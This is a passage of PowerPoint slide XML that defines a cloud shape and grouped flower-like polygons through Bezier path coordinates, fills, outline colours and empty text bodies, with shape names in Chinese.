                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="0"/>
                    <a:pt x="530" y="17"/>
                    <a:pt x="552" y="44"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="553" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="581" y="16"/>
                    <a:pt x="616" y="0"/>
                    <a:pt x="655" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="708" y="0"/>
                    <a:pt x="754" y="30"/>
                    <a:pt x="778" y="73"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="779" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="799" y="69"/>
                    <a:pt x="811" y="67"/>
                    <a:pt x="824" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="890" y="67"/>
                    <a:pt x="944" y="121"/>
                    <a:pt x="944" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="944" y="254"/>
                    <a:pt x="890" y="308"/>
                    <a:pt x="824" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="308"/>
                    <a:pt x="796" y="306"/>
                    <a:pt x="783" y="301"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="773" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772" y="300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="753" y="344"/>
                    <a:pt x="710" y="374"/>
                    <a:pt x="661" y="374"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="623" y="374"/>
                    <a:pt x="590" y="357"/>
                    <a:pt x="568" y="330"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="562" y="322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558" y="328"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="534" y="367"/>
                    <a:pt x="490" y="393"/>
                    <a:pt x="440" y="393"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="397" y="393"/>
                    <a:pt x="358" y="373"/>
                    <a:pt x="332" y="342"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="332" y="342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330" y="345"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="390"/>
                    <a:pt x="269" y="421"/>
                    <a:pt x="219" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="421"/>
                    <a:pt x="98" y="367"/>
                    <a:pt x="98" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="292"/>
                    <a:pt x="99" y="284"/>
                    <a:pt x="100" y="276"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="103" y="266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="253"/>
                    <a:pt x="0" y="205"/>
                    <a:pt x="0" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="80"/>
                    <a:pt x="54" y="26"/>
                    <a:pt x="121" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="26"/>
                    <a:pt x="206" y="51"/>
                    <a:pt x="226" y="89"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="228" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="88"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="75"/>
                    <a:pt x="277" y="67"/>
                    <a:pt x="302" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="67"/>
                    <a:pt x="326" y="69"/>
                    <a:pt x="337" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="348" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="74"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="30"/>
                    <a:pt x="410" y="0"/>
                    <a:pt x="460" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="E4374B"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:srgbClr val="005CA2">
                <a:shade val="50000"/>
              </a:srgbClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:srgbClr val="005CA2"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="005CA2"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="组合 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16227" y="7047"/>
              <a:ext cx="429" cy="359"/>
              <a:chOff x="13803" y="6625"/>
              <a:chExt cx="938" cy="938"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="任意多边形 9"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13803" y="6625"/>
                <a:ext cx="939" cy="939"/>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28" h="1025">
                    <a:moveTo>
                      <a:pt x="533" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="619" y="0"/>
                      <a:pt x="690" y="71"/>
                      <a:pt x="690" y="158"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="690" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="151"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="725" y="134"/>
                      <a:pt x="755" y="124"/>
                      <a:pt x="788" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="874" y="124"/>
                      <a:pt x="945" y="195"/>
                      <a:pt x="945" y="282"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="325"/>
                      <a:pt x="927" y="364"/>
                      <a:pt x="899" y="393"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="895" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="398"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="413"/>
                      <a:pt x="1028" y="476"/>
                      <a:pt x="1028" y="553"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="637"/>
                      <a:pt x="962" y="706"/>
                      <a:pt x="879" y="710"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="876" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="712"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="890" y="735"/>
                      <a:pt x="897" y="760"/>
                      <a:pt x="897" y="788"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="897" y="874"/>
                      <a:pt x="826" y="945"/>
                      <a:pt x="740" y="945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="696" y="945"/>
                      <a:pt x="657" y="927"/>
                      <a:pt x="628" y="899"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="627" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="612" y="971"/>
                      <a:pt x="549" y="1025"/>
                      <a:pt x="473" y="1025"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="1025"/>
                      <a:pt x="315" y="954"/>
                      <a:pt x="315" y="868"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="865"/>
                      <a:pt x="315" y="862"/>
                      <a:pt x="315" y="859"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="316" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="860"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="877"/>
                      <a:pt x="250" y="887"/>
                      <a:pt x="218" y="887"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="887"/>
                      <a:pt x="60" y="816"/>
                      <a:pt x="60" y="730"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="691"/>
                      <a:pt x="73" y="657"/>
                      <a:pt x="96" y="629"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="104" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="618"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="594"/>
                      <a:pt x="0" y="538"/>
                      <a:pt x="0" y="473"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="402"/>
                      <a:pt x="47" y="342"/>
                      <a:pt x="111" y="322"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="124" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="317"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="294"/>
                      <a:pt x="104" y="269"/>
                      <a:pt x="104" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="155"/>
                      <a:pt x="175" y="84"/>
                      <a:pt x="262" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="305" y="84"/>
                      <a:pt x="344" y="102"/>
                      <a:pt x="373" y="130"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="58"/>
                      <a:pt x="454" y="0"/>
                      <a:pt x="533" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FED65A"/>
              </a:solidFill>
              <a:ln w="3175">
                <a:solidFill>
                  <a:srgbClr val="E4374B"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:srgbClr val="005CA2">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:srgbClr val="005CA2"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:srgbClr val="005CA2"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="任意多边形 38"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14072" y="6894"/>
                <a:ext cx="400" cy="40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28" h="1025">
                    <a:moveTo>
                      <a:pt x="533" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="619" y="0"/>
                      <a:pt x="690" y="71"/>
                      <a:pt x="690" y="158"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="690" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="151"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="725" y="134"/>
                      <a:pt x="755" y="124"/>
                      <a:pt x="788" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="874" y="124"/>
                      <a:pt x="945" y="195"/>
                      <a:pt x="945" y="282"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="325"/>
                      <a:pt x="927" y="364"/>
                      <a:pt x="899" y="393"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="895" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="398"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="413"/>
                      <a:pt x="1028" y="476"/>
                      <a:pt x="1028" y="553"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="637"/>
                      <a:pt x="962" y="706"/>
                      <a:pt x="879" y="710"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="876" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="712"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="890" y="735"/>
                      <a:pt x="897" y="760"/>
                      <a:pt x="897" y="788"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="897" y="874"/>
                      <a:pt x="826" y="945"/>
                      <a:pt x="740" y="945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="696" y="945"/>
                      <a:pt x="657" y="927"/>
                      <a:pt x="628" y="899"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="627" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="612" y="971"/>
                      <a:pt x="549" y="1025"/>
                      <a:pt x="473" y="1025"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="1025"/>
                      <a:pt x="315" y="954"/>
                      <a:pt x="315" y="868"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="865"/>
                      <a:pt x="315" y="862"/>
                      <a:pt x="315" y="859"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="316" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="860"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="877"/>
                      <a:pt x="250" y="887"/>
                      <a:pt x="218" y="887"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="887"/>
                      <a:pt x="60" y="816"/>
                      <a:pt x="60" y="730"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="691"/>
                      <a:pt x="73" y="657"/>
                      <a:pt x="96" y="629"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="104" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="618"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="594"/>
                      <a:pt x="0" y="538"/>
                      <a:pt x="0" y="473"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="402"/>
                      <a:pt x="47" y="342"/>
                      <a:pt x="111" y="322"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="124" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="317"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="294"/>
                      <a:pt x="104" y="269"/>
                      <a:pt x="104" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="155"/>
                      <a:pt x="175" y="84"/>
                      <a:pt x="262" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="305" y="84"/>
                      <a:pt x="344" y="102"/>
                      <a:pt x="373" y="130"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="58"/>
                      <a:pt x="454" y="0"/>
                      <a:pt x="533" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FEC928"/>
              </a:solidFill>
              <a:ln w="0">
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:srgbClr val="005CA2">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:srgbClr val="005CA2"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:srgbClr val="005CA2"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="41" name="组合 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="17333" y="7047"/>
              <a:ext cx="429" cy="359"/>
              <a:chOff x="13803" y="6625"/>
              <a:chExt cx="938" cy="938"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="任意多边形 41"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13803" y="6625"/>
                <a:ext cx="939" cy="939"/>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28" h="1025">
                    <a:moveTo>
                      <a:pt x="533" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="619" y="0"/>
                      <a:pt x="690" y="71"/>
                      <a:pt x="690" y="158"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="690" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="151"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="725" y="134"/>
                      <a:pt x="755" y="124"/>
                      <a:pt x="788" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="874" y="124"/>
                      <a:pt x="945" y="195"/>
                      <a:pt x="945" y="282"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="325"/>
                      <a:pt x="927" y="364"/>
                      <a:pt x="899" y="393"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="895" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="398"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="413"/>
                      <a:pt x="1028" y="476"/>
                      <a:pt x="1028" y="553"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="637"/>
                      <a:pt x="962" y="706"/>
                      <a:pt x="879" y="710"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="876" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="712"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="890" y="735"/>
                      <a:pt x="897" y="760"/>
                      <a:pt x="897" y="788"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="897" y="874"/>
                      <a:pt x="826" y="945"/>
                      <a:pt x="740" y="945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="696" y="945"/>
                      <a:pt x="657" y="927"/>
                      <a:pt x="628" y="899"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="627" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="612" y="971"/>
                      <a:pt x="549" y="1025"/>
                      <a:pt x="473" y="1025"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="1025"/>
                      <a:pt x="315" y="954"/>
                      <a:pt x="315" y="868"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="865"/>
                      <a:pt x="315" y="862"/>
                      <a:pt x="315" y="859"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="316" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="860"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="877"/>
                      <a:pt x="250" y="887"/>
                      <a:pt x="218" y="887"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="887"/>
                      <a:pt x="60" y="816"/>
                      <a:pt x="60" y="730"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="691"/>
                      <a:pt x="73" y="657"/>
                      <a:pt x="96" y="629"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="104" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="618"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="594"/>
                      <a:pt x="0" y="538"/>
                      <a:pt x="0" y="473"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="402"/>
                      <a:pt x="47" y="342"/>
                      <a:pt x="111" y="322"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="124" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="317"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="294"/>
                      <a:pt x="104" y="269"/>
                      <a:pt x="104" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="155"/>
                      <a:pt x="175" y="84"/>
                      <a:pt x="262" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="305" y="84"/>
                      <a:pt x="344" y="102"/>
                      <a:pt x="373" y="130"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="58"/>
                      <a:pt x="454" y="0"/>
                      <a:pt x="533" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FED65A"/>
              </a:solidFill>
              <a:ln w="3175">
                <a:solidFill>
                  <a:srgbClr val="E4374B"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:srgbClr val="005CA2">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:srgbClr val="005CA2"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:srgbClr val="005CA2"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="任意多边形 42"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14072" y="6894"/>
                <a:ext cx="400" cy="40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28" h="1025">
                    <a:moveTo>
                      <a:pt x="533" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="619" y="0"/>
                      <a:pt x="690" y="71"/>
                      <a:pt x="690" y="158"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="690" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="151"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="725" y="134"/>
                      <a:pt x="755" y="124"/>
                      <a:pt x="788" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="874" y="124"/>
                      <a:pt x="945" y="195"/>
                      <a:pt x="945" y="282"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="325"/>
                      <a:pt x="927" y="364"/>
                      <a:pt x="899" y="393"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="895" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="398"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="413"/>
                      <a:pt x="1028" y="476"/>
                      <a:pt x="1028" y="553"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="637"/>
                      <a:pt x="962" y="706"/>
                      <a:pt x="879" y="710"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="876" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="712"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="890" y="735"/>
                      <a:pt x="897" y="760"/>
                      <a:pt x="897" y="788"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="897" y="874"/>
                      <a:pt x="826" y="945"/>
                      <a:pt x="740" y="945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="696" y="945"/>
                      <a:pt x="657" y="927"/>
                      <a:pt x="628" y="899"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="627" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="612" y="971"/>
                      <a:pt x="549" y="1025"/>
                      <a:pt x="473" y="1025"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="1025"/>
                      <a:pt x="315" y="954"/>
                      <a:pt x="315" y="868"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="865"/>
                      <a:pt x="315" y="862"/>
                      <a:pt x="315" y="859"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="316" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="860"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="877"/>
                      <a:pt x="250" y="887"/>
                      <a:pt x="218" y="887"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="887"/>
                      <a:pt x="60" y="816"/>
                      <a:pt x="60" y="730"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="691"/>
                      <a:pt x="73" y="657"/>
                      <a:pt x="96" y="629"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="104" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="618"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="594"/>
                      <a:pt x="0" y="538"/>
                      <a:pt x="0" y="473"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="402"/>
                      <a:pt x="47" y="342"/>
                      <a:pt x="111" y="322"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="124" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="317"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="294"/>
                      <a:pt x="104" y="269"/>
                      <a:pt x="104" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="155"/>
                      <a:pt x="175" y="84"/>
                      <a:pt x="262" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="305" y="84"/>
                      <a:pt x="344" y="102"/>
                      <a:pt x="373" y="130"/>
